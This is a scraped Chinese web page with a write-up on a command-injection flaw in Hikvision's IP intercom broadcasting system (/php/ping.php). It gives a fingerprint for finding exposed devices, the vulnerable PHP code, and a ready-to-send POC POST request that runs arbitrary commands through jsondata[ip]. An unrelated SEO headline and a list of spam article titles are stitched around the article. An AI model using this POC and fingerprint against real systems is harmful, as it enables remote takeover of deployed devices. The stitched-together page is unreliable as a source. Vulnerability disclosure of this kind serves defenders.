当前位置: 首页 > news >正文

国外免费源码网站一般电商网站做集群

国外免费源码网站,一般电商网站做集群,企业官网模板下载,网站建设期间注意事项漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/ph…

漏洞介绍

海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
在这里插入图片描述

资产测绘

icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

查看漏洞关键代码:

header("Content-type: text/html; charset=GB2312");
$postData = $_POST['jsondata'];
if(isset($postData['ip']) && isset($postData['type'])){$type = $postData['type'];//类型$ip = $postData['ip'];//IP地址$arr = systemopr($type, $ip);$len = count($arr);for($i = 0; $i < $len; $i++){if(isset($arr[$i])){$arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8}}$after = json_encode($arr);//转换成jsonecho $after;
}function systemopr($type, $ip, $times=4){$info = array();     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){//linuxif($type == "0"){exec("ping -c $times $ip", $info);}else if($type == "1"){exec("traceroute -m $times -w 1 $ip", $info);}else{exec($ip, $info);}}else{//windowsif($type == "0"){exec("ping $ip -n $times", $info);}else if($type == "1"){exec("tracert -h $times -w 1000 $ip", $info);}else{exec($ip, $info);}}return $info;
}

可以发现当$postData['type']$postData['ip']存在值时,则会传入systemopr函数,通过exec()函数进行拼接命令执行,当$postData['type']等于0或1时,则代入指定代码段,执行指定命令。但$postData['type']参数值不等于0和1时,可以不考虑参数闭合,直接可以通过$postData['ip']执行任意命令。而且恰巧$postData['type']$postData['ip']的值都是POST传参可控的,导致我们可以执行任意系统命令。

POC如下:

POST /php/ping.php HTTP/1.1
Host: your_ip
Content-Length: 46
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: closejsondata%5Btype%5D=3&jsondata%5Bip%5D=ipconfig

在这里插入图片描述

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.spon.com.cn/

http://www.yayakq.cn/news/792436/

相关文章:

  • 建设网站教程视频视频视频郑州seo优化服务
  • 网站建设品牌公司哪家好阿里巴巴国际站怎么运营
  • 成都市建设工程交易中心网站中国林业网站群建设工程
  • 上海城乡住房建设部网站首页impreza wordpress
  • 网站链接文字网络推广主要内容
  • 网页上传和网站开发哪个网站反盗版做的最好
  • 网站空间信息查询wordpress给分页加链接
  • 高端大气的的网站天津网站建设推广
  • 盐城做网站找哪家好个体网站建设
  • 微商手机网站制作结构优化是什么意思
  • 网站logo在哪里修改网页设计构思
  • 网站建设系统设计wordpress评论系统
  • 自学免费网站建设电商seo优化是什么
  • 南宁市网站开发建设wordpress4.5 缩略图函数
  • php小网站新开传奇最大网站999
  • 自适应网站可以做伪静态页面吗网站的技术方案
  • 网站备案流程审核单学校网站建设交流汇报
  • 做网盘搜索网站合法吗外贸网站首页
  • 做网站建设公司网站设计wordpress 文章页幻灯片
  • 东莞做网站的联系电大数据营销系统软件
  • 专门做岛屿的网站wordpress 多demo
  • 河北网站制作 网站开发校园网站的作用
  • 文章类网站模板电子商城开发网站开发
  • 网站建设如何包含数据库一微网站建设公司好
  • 深圳模板网站建设案例网站建设中长出现的问题
  • 做动效的网站中国建设银行个人网站
  • 广东省网站集约化建设通知优设网址导航属于网络导航吗
  • 网牛网站建设个人可以做网站吗
  • 哪个公司可以做网站莆田网站建设多少钱
  • 无锡祥搜做网站推广电子商城网站建设参考文献